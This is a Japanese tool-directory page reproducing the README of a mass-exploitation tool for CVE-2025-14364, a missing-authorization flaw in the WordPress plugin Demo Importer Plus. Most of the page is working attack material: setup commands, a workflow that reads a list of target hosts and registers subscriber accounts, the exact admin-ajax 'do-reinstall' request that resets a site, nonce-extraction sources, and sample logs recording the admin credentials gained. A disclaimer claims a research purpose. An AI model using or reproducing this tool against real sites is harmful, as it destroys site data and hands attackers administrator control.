Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - 認証欠如による認証済み(購読者以上)ユーザーによるサイトリセットと権限昇格 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-14364
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - 認証欠如による認証済み(購読者以上)ユーザーによるサイトリセットと権限昇格

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - 認証済み(サブスクライバー以上)のサイトリセットおよび権限昇格における認可の欠如

CVE-2025-14364 — Demo Importer Plus · 完全サイトリセット → 権限昇格

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |

認証済みサブスクライバー → 管理者 (do-reinstall AJAX アクションによる)


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 脆弱性

根本原因:
Ajax::handle_request() は current_user_can() を呼び出さずに demo_importer_plus AJAX アクションを登録します。認証済みのサブスクライバーは {"demo_action":"do-reinstall"} を送信して wp_install() をトリガーでき、これによりすべてのデータベーステーブル(users / usermeta を除く)が削除され、WordPress のセットアップが再実行されます。その過程で攻撃アカウントに 管理者ロール が自動的に割り当てられます。


〔 2 〕 攻撃フロー

root@kitploit:~
Mode 1 — Diagnose
  Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identify live WordPress targets

Mode 2 — Register
  POST /wp-login.php?action=register
  → Create subscriber account
  → Activation email sent to inbox
     ↳ You MUST click the email link before running Mode 3

Mode 3 — Exploit
  POST /wp-login.php                         → Authenticate as subscriber
  GET  /wp-admin/                            → Extract wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Trigger full site reset
  ← Response: "Site has been reset successfully"
  → Attacking account now holds Administrator role

〔 3 〕 セットアップ

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 使い方

root@kitploit:~
Mode [1/2/3]:           1 = Diagnose   2 = Register   3 = Exploit
Targets file:           list.txt  (one host per line)
Concurrency:            default 30, max 200
Timeout:                default 10s

ターゲットフォーマット — list.txt:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

► モード 1 · 診断

Probes four endpoints per host and writes clean results.

root@kitploit:~
Mode: 1

出力 → diagnostics_results.txt · passed_targets.txt


► モード 2 · 登録

root@kitploit:~
Mode: 2
Email:    [email protected]
Username: Nxploited
Password: NxploitedSA

受信トレイを確認し、モード3を実行する前にアクティベーションリンクをクリックしてください。

出力 → register_results.txt


► モード 3 · 悪用

root@kitploit:~
Mode: 3
Username: Nxploited
Password: NxploitedSA

成功するとツールは以下を出力します:

root@kitploit:~
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com

そして exploit_results.txt に書き込みます:

root@kitploit:~
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 出力ファイル


〔 6 〕 技術的詳細

脆弱性のあるリクエスト:

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>

{"demo_action":"do-reinstall"}

成功応答:

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

Nonce抽出 — 2つのフォールバックソース:

root@kitploit:~
wpApiSettings.nonce              (from /wp-admin/ page source)
elementorOneSettingsData.wpRestNonce   (fallback)

〔 7 〕 作者と連絡先

root@kitploit:~
By   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 免責条項

root@kitploit:~
このソフトウェアはセキュリティ研究および教育目的でのみ公開されています。

作者は、このツールを使用して、オペレーターが所有していない、または明示的な書面によるテスト許可を得ていないシステムに対して行われたいかなる行為についても一切の責任を負いません。

第三者のシステムに対する無許可の使用は、ほとんどの法域(CFAA、CMA、および世界各国の同等法)においてコンピュータ犯罪法に違反し、刑事訴追の対象となる可能性があります。

このツールをターゲットに対して実行する前に、合法的な許可を得ていることを確認する責任はあなただけにあります。

© 2025 Nxploited · セキュリティ研究専用 · Demo Importer Plus ≤ 2.0.8 · 2.0.9で修正
ツールをダウンロード
CVECVE-2025-14364
CVSS v3.18.8 高 — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
PluginDemo Importer Plus
Affectedすべてのバージョン ≤ 2.0.8
Auth neededサブスクライバー(最も低い登録ロール)
Type機能チェックの欠如 → 完全サイトリセット → 権限昇格
CWECWE-862 · 認可の欠如
ファイル内容
diagnostics_results.txtターゲットごとの完全プローブJSON
passed_targets.txtクリーンなターゲット(エラー未検出)
register_results.txt登録試行の記録
exploit_results.txtログイン·nonce·リセット結果·管理者ヒット確認
reset_results.txtターゲットごとの生の do-reinstall 応答